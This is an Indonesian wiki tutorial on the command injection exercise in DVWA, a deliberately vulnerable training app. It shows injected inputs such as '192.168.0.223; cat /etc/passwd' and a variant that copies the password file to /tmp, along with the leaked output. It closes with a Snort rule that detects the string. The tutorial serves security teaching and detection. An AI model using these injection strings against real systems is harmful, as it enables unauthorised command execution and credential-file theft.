DVWA: Command Injection

From OnnoWiki
Revision as of 10:52, 31 March 2017 by Onnowpurbo (talk | contribs)
Jump to navigation Jump to search
  • Login ke DVWA
  • Klik Command Injection
  • Ping isi IP yang bisa di ping misalnya, router anda, misalnya
192.168.0.223
  • Hasilnya kira-kira
PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data.
64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms
64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms
64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms
64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms

--- 192.168.0.223 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms


  • Tambahkan perintah cat sesudah nomor IP, misalnya
192.168.0.223; cat /etc/passwd


PING 192.168.0.223 (192.168.0.223) 56(84) bytes of data.
64 bytes from 192.168.0.223: icmp_seq=1 ttl=64 time=0.560 ms
64 bytes from 192.168.0.223: icmp_seq=2 ttl=64 time=0.696 ms
64 bytes from 192.168.0.223: icmp_seq=3 ttl=64 time=0.692 ms
64 bytes from 192.168.0.223: icmp_seq=4 ttl=64 time=0.631 ms

--- 192.168.0.223 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2999ms
rtt min/avg/max/mdev = 0.560/0.644/0.696/0.063 ms
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
..
..
dst
  • Lihat source DVWA mengapa melakukan hal itu
cat /var/www/html/DVWA-1.9/vulnerabilities/exec/source/low.php


  • Kalau iseng, coba copy password ke tmp, inject command
192.168.1.106; cat /etc/passwd | tee /tmp/passwd


Snort Rule

Untuk mendeteksi kegiatan ini, bisa tambahkan di snort local.rules

alert tcp any any -> 192.168.0.100 80 (content: "cat /etc/passwd"; msg: "WARNING: mencuri password!"; sid:1000002;)